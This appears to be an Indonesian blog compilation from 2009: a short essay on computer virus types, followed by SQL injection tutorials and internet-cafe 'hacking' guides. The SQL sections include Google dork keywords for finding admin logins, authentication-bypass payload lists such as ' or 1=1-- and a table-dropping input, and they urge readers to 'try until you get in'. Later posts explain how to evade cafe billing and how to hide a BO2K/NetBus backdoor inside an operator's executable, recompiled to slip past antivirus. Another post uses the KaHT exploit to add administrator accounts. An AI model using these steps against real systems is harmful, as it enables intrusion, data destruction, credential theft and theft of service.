istilah virus komputer tak asing lagi bagi kalangan pengguna komputer saat ini. Padahal, sekitar 12 tahun yang lalu, istilah ini telah dikenal oleh masyarakat pengguna komputer. Baru pada tahun 1988, muncul artikel-artikel di media massa yang dengan gencar memberitakan mengenai ancaman baru bagi para pemakai komputer yang kemudian dikenal dengan sebutan ‘virus komputer’. Virus yang terdapat pada komputer hanyalah berupa program biasa, sebagaimana layaknya program-program lain. Tetapi terdapat perbedaan yang sangat mendasar pada virus komputer dan program lainnya. Virus dibuat oleh seseorang dengan tujuan yang bermacam-macam, tetapi umumnya para pembuat virus hanyalah ingin mengejar popularitas dan juga hanya demi kesenangan semata. Tetapi apabila seseorang membuat virus dengan tujuan merusak maka tentu saja
akan mengacaukan komputer yang ditularinya.

Kemampuan Dasar Virus Komputer

Definisi umum virus komputer adalah program komputer yang biasanya berukuran kecil yang dapat meyebabkan gangguan atau kerusakan pada sistem komputer dan memiliki beberapa kemampuan dasar, diantaranya adalah :

Kemampuan untuk memperbanyak diri
Yakni kemampuan untuk membuat duplikat dirinya pada file-file atau disk-disk yang belum ditularinya, sehingga lama-kelamaan wilayah penyebarannya semakin luas.

Kemampuan untuk menyembunyikan diri
Yakni kemampuan untuk menyembunyikan dirinya dari perhatian user, antara lain dengan cara-cara berikut :
a. Menghadang keluaran ke layar selama virus bekerja, sehingga pekerjaan virus tak tampak oleh user.
b. Program virus ditempatkan diluar track2 yang dibuat DOS (misalkan track 41)
c. Ukuran virus dibuat sekecil mungkin sehingga tidak menarik kecurigaan.


Kemampuan untuk mengadakan manipulasi
Sebenarnya rutin manipulasi tak terlalu penting. Tetapi inilah yang sering mengganggu. Biasanya rutin ini dibuat untuk :
a. Membuat tampilan atau pesan yang menggangu pada layer monitor
b. Mengganti volume label disket
c. Merusak struktur disk, menghapus file-file
d. Mengacaukan kerja alat-alat I/O, seperti keyboard dan printer

Kemampuan untuk mendapatkan informasi
Yakni kemampuan untuk mendapatkan informasi tentang struktur media penyimpanan seperti letak boot record asli, letak table partisi, letak FAT3, posisi suatu file, dan sebagainya.


Kemampuan untuk memeriksa keberadaan dirinya
Sebelum menyusipi suati file virus memeriksa keberadaan dirinya dalam file itu dengan mencari ID (tanda pengenal) dirinya di dalam file itu. File yang belum tertular suatu virus tentunya tidak mengandung ID dari virus yang bersangkutan. Kemampuan ini mencegah penyusupan yang berkali-kali pada suatu file yang sama.

2.4 Jenis-jenis virus komputer

Berikut ini akan dibahas jenis-jenis virus yang penulis simpulkan dari berbagai sumber, baik sumber pustaka maupun sumber dari internet.

2.4.1 Berdasarkan Teknik Pembuatannya

a. Virus yang dibuat dengan compiler
Adalah virus yang dapat dieksekusi karena merupakan virus yang telah di compile sehingga menjadi dapat dieksekusi langsung. Virus jenis ini adalah virus yang pertama kali muncul di dunia komputer, dan sampai sekarang terus berkembang pesat. Biasanya virus jenis ini dibuat dengan bahasa pemrograman tingkat rendah yang disebut dengan assembler, karena dengan menggunakan assembler program yang dihasilkan lebih kecil dan cepat, sehingga sangat cocok untuk membuat virus. Tetapi tidak tertutup kemungkinan untuk membuat virus dengan menggunakan bahasa pemrograman lainnya seperti C dan Pascal baik dilingkungan DOS maupun Windows .
Mungkin virus jenis ini adalah virus yang paling sulit untuk dibuat tetapi karena dibuat dengan menggunakan bahasa pemrograman dan berbentuk bahasa mesin maka keunggulan dari virus ini adalah mampu melakukan hampir seluruh manipulasi yang mana hal ini tidak selalu dapat dilakukan oleh virus jenis lain karena lebih terbatas.


b. Virus Macro

 
  Banyak orang salah kaprah dengan jenis virus ini, mereka menganggap bahwa virus Macro adalah virus yang terdapat pada program Microsoft Word. Memang hampir seluruh virus Macro yang ditemui merupakan virus Microsoft Word. Sebenarnya virus Macro adalah virus yang memanfaatkan fasilitas pemrograman modular pada suatu program aplikasi tertentu seperti Microsoft Word, Microsoft Excel, Microsoft PowePoint, Corel WordPerfect, dan sebagainya. Tujuan dari fasilitas pemrograman modular ini adalah untuk memberikan suatu kemudahan serta membuat jalan pintas bagi
aplikasi tersebut. Sayangnya fungsi ini dimanfaatkan oleh pembuat-pembuat virus untuk membuat virus didalam aplikasi tersebut. Walaupun virus ini terdapat didalam aplikasi tertentu tetapi bahaya yang ditimbulkan tidak kalah berbahanya dari virus-virus yang lain.


c. Virus Script/ Batch

    Pada awalnya virus ini lebih dikenal dengan virus batch karena dulu terdapat pada file batch yang terdapat pada DOS, sekarang hal ini telah berganti menjadi script. Virus script biasanya sering didapat dari Internet karena kelebihannya yang fleksibel dan bisa berjalan pada saat kita bermain internet, virus jenis ini biasanya menumpang pada file HTML (Hype Text Markup Language) dibuat dengan menggunakan fasilitas script seperti Javascript, VBscript,4 maupun gabungan antara script yang mengaktifkan program Active-X dari Microsoft Internet Explorer.

a. Virus Boot Sector
    Virus Boot Sector adalah virus yang memanfaatkan gerbang hubungan antara komputer dan media penyimpan sebagai tempat untuk menularkan virus. Apabila pada boot sector terdapat suatu program yang mampu menyebarkan diri dan mampu tinggal di memory selama komputer bekerja, maka program tersebut dapat disebut virus. Virus boot sector terbagi dua yaitu virus yang menyerang disket dan virus yang menyerang disket dan tabel partisi.

b. Virus File  
    Virus file merupakan virus yang memafaatkan suatu file yang dapat diproses langsung pada editor DOS, seperti file berekstensi COM, EXE, beberapa file overlay, dan file BATCH. Virus umumnya tidak memiliki kemampuan untuk menyerang di semua file tersebut. Virus file juga dikelompokkan berdasarkan dapat atau tidaknya tingga di memory.

c. Virus System
    Virus sistem merupakan virus yang memanfaatkan file-file yang dipakai untuk membuat suatu sistem komputer. Contohnya adalah file dengan berekstensi SYS, file IBMBIO.COM, IBMDOS.COM, atau COMMAND.COM.

d. Virus Hybrid
    Virus ini merupakan virus yang mempunyai dua kemampuan biasanya dapat masuk ke boot sector dan juga dapat masuk ke file. Salah satu contoh virus ini adalah virus Mystic yang dibuat di Indonesia.
e. Virus Registry WIndows
    Virus ini menginfeksi operating system yang menggunakan Windows 95/98/NT biasanya akan mengadakan infeksi dan manipulasi pada bagian registry Windows sebab registry adalah tempat menampung seluruh informasi komputer baik hardware maupun software. Sehingga setiap kali kita menjalankan Windows maka virus akan dijalankan oleh registry tersebut.

f. Virus Program Aplikasi
   Virus ini merupakan virus Macro, menginfeksi pada data suatu program aplikasi tertentu. Virus ini baru akan beraksi apabila kita menjalankan program aplikasi tersebut dan membuka data yang mengandung virus.

Berdasarkan media penyebarannya

a. Penyebaran dengan media fisik
    Media yang dimaksudkan bisa dengan disket, CD-ROM (Compact Disc Read Only Memory), harddisk, dan sebagainya. Untuk CD-ROM, walaupun media ini tidak dapat dibaca tetapi ada kemungkinan suatu CD-ROM mengandung virus tertentu, walaupun kemungkinannya kecil, tetapi seiring dengan berkembangnya alat CD-R/CD-RW yang beredar dipasaran maka kemungkinan adanya virus didalam CD-ROM akan bertambah pula. Untuk saat ini virus jenis ini yang menjadi dominan dari seluruh virus yang ada. Virus ini akan menular pada komputer yang masih belum tertular apabila terjadi pengaksesan pada file/media yang mengandung virus yang diikuti dengan pengaksesan file/media yang masih bersih, dapat juga dengan mengakes file/media yang masih bersih sedangkan di memori komputer terdapat virus yang aktif.

b. Penyebaran dengan Media Internet  
   
Akhir-akhir ini virus yang menyebar dengan media sudah semakin banyak, virus ini biasanya menyebar lewat e-mail ataupun pada saat kita mendownload suatu file yang mengandung virus. Juga ada beberapa virus yang secara otomatis akan menyebarkan dirinya lewat e-mail apabila komputer memiliki hubungan ke jalur internet

Kamis, Maret 12, 2009

TUTORIAL SQL INJECTION

Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. 

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. 
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form. 

Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account. 
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database. 
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server. 


Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection
 

Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username 
2) Query database awal :
 

Berubah menjadi :
 



Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :
 

Penanganan SQL Injection 
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " . 
"where email = '$Email' and password = '$Password'"; 
$hasil = mySQL_query($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))

$Id = $row[0]; 
$name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 

if(strcmp($block, 'yes') == 0)
{
echo "\n"; 
exit(); 

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut : 
 
Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user". 
"where email = '$Email'"; 
$hasil = mySQL_query($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))

$Id = $row[0]; 
$name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 

if(strcmp($block, 'yes') == 0)

echo "\n"; 
exit(); 

$pass = md5($Password); 
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
 

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion

Contoh : $kar = “SQL injec’tion”; 
  $filter = mySQL_escape_string($kar); 
  echo”Hasil filter : $filter”; 
Hasilnya : 
 

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php

Contoh :
 

Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true 
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp" 
"/login.asp" 
"/logon.asp" 
"/adminlogin.asp" 
"/adminlogon.asp" 
"/admin_login.asp" 
"/admin_logon.asp" 
"/admin/admin.asp" 
"/admin/login.asp" 
"/admin/logon.asp" 
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword). 
4) Masukkan kode berikut :
User name : ` or `a'='a 
Password : ` or `a'='a (termasuk tanda petiknya) 
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, 
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak. 
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain : 
User name : admin 
Password : ` or `a'='a 
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ; 
 “ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION

1) Batasi panjang input box (jika memungkinkan), dengan

cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

R E F E R E N S I 

1) -------------, SQLinjection, (www.BlackAngels.it).

2) -------------, Advanced SQL injection in SQL server applications, (www.ngssoftware.com).
3) -------------, SQL injection walktrough (www.securiteam.com).
4) BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005, (http://www.jasakom.com). 
5) Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet”, PT Insan Indonesia & PT INDOCISC, Jakarta,2002. 

DASAR-DASAR SQL INJECTION

Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan 
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query' 
dengan cara manipulasi data input ke applikasi tsb. 
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan 
beberapa sql injection pada url.


Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment 
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language" 
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out' 
dari delimiter nya SQL Jadi kalau misal ada inputan 
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya 
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan 
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin 
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter 
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1-- 
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :




Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan 
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection
dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini berguna .

HACKER

Senin, Maret 09, 2009


Warningsssssssssssssssss :

(((((((( Pertidaktanggungjawaban : Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem komputer terutama para operator / SysAdmin dari server warnet, penulis tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun bentuknya.tulisan ini dibuat bukan untuk mecuri rejeki orang,tetapi hanya untuk memperluas wawasan para netter indonesia )))))))


OK bro we stay here and get the tags bya doing. INget … JUST DOIT …. SO CLOSE ……. prinsipnya katyak gitu degh.


Cara pertama

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:


1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi             Flash Disk (FB) 512 / 1 GB et.
    Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya: 

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai          juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake                google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada              yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang        belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang                          menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka               yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda.

NB : Program ini tidak dapat digunakan untuk warnet2 yang menggunakan GEtBack..

Cara kedua

1.pasang muka culun (ato bego) kek yg diomongkan diatas
2.sediah kopi
3.tentunya rokok
4.nah sekarang yg perlu kalian jalankan adalah
5.cabut kabel lan cardnya …
6.trus restart komputer kamu
7.jika sudah kluar gambar desktop sebelum gambar billing itu kluar kamu cepet²an tekan alt+del+ctrl dan kamu del yg client 008

Cara ketiga

Sering kali kita menjadi lupa waktu bila berada didepan komputeruntuk surfing dan hal ini ngak jadi masalah bila memakai komputer di kantor dengan koneksi broadband atau Dsl. Masalah baru muncul apabila kita surfing di Warnet. Proteksi yang biasa digunakan oleh warnet pada umumnya adalah nag screen atau window yang mengharuskan kita login terlebih dahulu [note:login ini berbeda dengan login start up] karena pada dasarnya komputer sudah dalam keadaan siap pakai hanya terhalang oleh nag screen tersebut, sedangkan koneksi ke internet dalam keadaan stand by. Yang harus dilakukan adalah membypass proteksi tersebut.

Prosedurnya adalah :
Tetap harus login terlebih dahulu agar tidak mencurigakan

Download Wincontrol –>> winctrl.exe untuk bypass login screen

Ekstrak wincontrol dan aktifkan
F9 = untuk menghilangkan window pada aktif cursor
F10= untuk mengembalikan window seperti semula
Jalankan timer untuk mengingatkan durasi waktu yang diinginkan
Logout bila telah mencapai biaya yang ditetapkan, biasanya tarif perjam Rp 6.000,-
Setelah logout tekan F9 maka login screen akan menghilang dan kita bisa kembali surfing tanpa biaya. Jangan lupa untuk menonaktifkan wincontrol setelah selesai.

Usahakan agar tidak terlalu menarik perhatian penjaga warnet [ surfing selama 3 jam = Rp 1500 ? ] cari warnet yang mempunyai banyak workstations-nya.

Untuk Mendownload Wincontrol dapat di download di
www.yogyafree.net

Cara keempat

Alat yang dibutuhkan : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !

Praktek : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).

- Siapkan program backdoor kamu yang sudah kkamu konfigurasi bo,netbus.. terserah kamu ;p >, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.

- Cari program .exe yang biasanya sering dippakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.

- Copy file tersebut di komputer client warnnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )

- Delete file original di komputer server (HHati - hati jika tdk bisa kemungkinan
program sedang dipakai, pake program lain spt iexplore.exe ).

- Setelah mendelete file asli di komputer seerver, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.

- Logout dari client warnet dan bayar sewa iinternet. (Pasang muka lugu dan bego).

- Setelah sehari dirasa cukup maka kembali llagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ….. SELAMAT BUNG !! Anda layak tertawa….. hi….hi…hi….., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu….., lisst password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x…..tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa “ENCRYPT” sama sekali.. (From other)


Nah kalau cara diatas belom juga bikin lho seneng …. Coba lagi aja degh pake KAHT (baca disini). Cara pemakaiannya seperti ini bro mudah-mudahan lho gak lupa lagi:


1. Download program KaHT letakkin di folder c:\windows\system32 (kalo XP)
2. Buka start > run… ketikkan CMD
3. ketikkan : Kaht 127.0.0.1 127.0.0.2
4. Kalo prompt pindah ke system32 berarti berhasil, kalo ga bisa pastiin port yg dipake kaht ga tertutup. Dan kompi kita wajib belom pake SP2
5. Ketik:
net user [username] [userpass] /add
net localgroup Administrator [username] /add
6. Misalnya : Kayaknya udah dijelasin deh, ga usah ya.

- Having fun….. and stay out of troble ..ddan ingat “Junjunglah Etika HACKER”, jangan sekali -kali membuat kerusakan, cukup untuk kamu

lihat -lihat server warnet…OK


Reference by:

A R I E S 

A G H I S

H E N D R A Y

H A R I A D I

E N Z H A 2 1






Kamis, Maret 05, 2009

"PRINSIP SEORANG  HACKER"
 
    Kami adalah sekumpulan individu yang ingin bebas memacu kinerja otak dan adrenalin di tubuh kami; ingin bebas melakukan hal-hal menarik yang sulit terpecahkan bahkan mustahil sekalipun; ingin bebas meneliti untaian kode yang ada, mencari kelemahan bukan untuk melemahkan; ingin bebas menemukan keasyikan menelusuri elektron dan baud tanpa batasan waktu; ingin bebas bergerak dalam aliran pulsa yang terhantar bebas keseluruh titik di dunia; ingin bebas menentukan sendiri apa yang Kami butuhkan dan Kami percayai; ingin bebas berkomunikasi, menjelajah dan menikmati ini dengan bebas tanpa ada perbedaan, ingin bebas bertukar, belajar dan berbagi semua kemurnian ilmu pengetahuan, bukan oleh aturan-aturan yang telah ditentukan dan dikendalikan ketamakan, bukan demi setumpuk kekayaan, kejayaan ataupun keabadian, bukan pula untuk merusak, menakuti atau bahkan menghancurkan, tetapi hanya demi kenyataan bahwa Kami sama

Maukie - the virtual cat